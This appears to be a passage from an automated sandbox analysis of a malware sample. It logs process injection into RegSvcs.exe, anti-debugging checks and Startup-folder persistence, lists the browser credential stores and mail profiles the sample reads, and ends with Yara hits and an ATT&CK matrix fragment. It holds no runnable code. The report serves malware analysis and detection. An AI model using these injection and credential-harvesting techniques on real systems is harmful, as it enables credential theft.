              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598686Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598577Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597262Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595951Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595296Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594830Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: RegSvcs.exe, 0000000A.00000002.4088550668.0000000000B58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll81
              Source: PsBygexGwH.exe, 00000000.00000003.1624604950.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, PsBygexGwH.exe, 00000000.00000002.2976091390.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2976079470.000000000176E000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000009.00000003.3106831071.0000000001C5D000.00000004.00000020.00020000.00000000.sdmp, troopwise.0.drBinary or memory string: GL9=6HGFS
              Source: wscript.exe, 00000008.00000002.3105555476.0000012C6D816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: RegSvcs.exe, 00000007.00000002.4087601813.00000000007EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

              Anti Debugging

              barindex
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002CD010 Start: 002CD039 End: 002CD0296_2_002CD010
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002CD010 rdtsc 6_2_002CD010
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_04F77BA8 LdrInitializeThunk,7_2_04F77BA8
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019EAA2 BlockInput,0_2_0019EAA2
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00152622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00152622
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001242DE
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00144CE8 mov eax, dword ptr fs:[00000030h]0_2_00144CE8
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_023C3650 mov eax, dword ptr fs:[00000030h]0_2_023C3650
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_023C36B0 mov eax, dword ptr fs:[00000030h]0_2_023C36B0
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_023C1ED0 mov eax, dword ptr fs:[00000030h]0_2_023C1ED0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E4CE8 mov eax, dword ptr fs:[00000030h]6_2_002E4CE8
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_039036B0 mov eax, dword ptr fs:[00000030h]6_2_039036B0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03903650 mov eax, dword ptr fs:[00000030h]6_2_03903650
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03901ED0 mov eax, dword ptr fs:[00000030h]6_2_03901ED0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 9_2_03D43650 mov eax, dword ptr fs:[00000030h]9_2_03D43650
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 9_2_03D41ED0 mov eax, dword ptr fs:[00000030h]9_2_03D41ED0
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 9_2_03D436B0 mov eax, dword ptr fs:[00000030h]9_2_03D436B0
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00180B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00180B62
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00152622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00152622
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0014083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0014083F
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001409D5 SetUnhandledExceptionFilter,0_2_001409D5
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00140C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00140C21
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_002F2622
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_002E083F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E09D5 SetUnhandledExceptionFilter,6_2_002E09D5
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_002E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_002E0C21
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 25D008Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 60F008Jump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00181201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00181201
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00162BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00162BA5
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018B226 SendInput,keybd_event,0_2_0018B226
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001A22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_001A22DA
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PsBygexGwH.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00180B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00180B62
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00181663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00181663
              Source: PsBygexGwH.exe, name.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: PsBygexGwH.exe, name.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00140698 cpuid 0_2_00140698
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00198195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00198195
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0017D27A GetUserNameW,0_2_0017D27A
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0015BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0015BB6F
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001242DE
              Source: C:\Users\user\Desktop\PsBygexGwH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3844, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: name.exeBinary or memory string: WIN_81
              Source: name.exeBinary or memory string: WIN_XP
              Source: name.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: name.exeBinary or memory string: WIN_XPe
              Source: name.exeBinary or memory string: WIN_VISTA
              Source: name.exeBinary or memory string: WIN_7
              Source: name.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3844, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3844, type: MEMORYSTR
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_001A1204
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_001A1806
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00341204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_00341204
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00341806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00341806
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting
              2
              Valid Accounts
              1
              Native API
              111
              Scripting
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              2
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              21
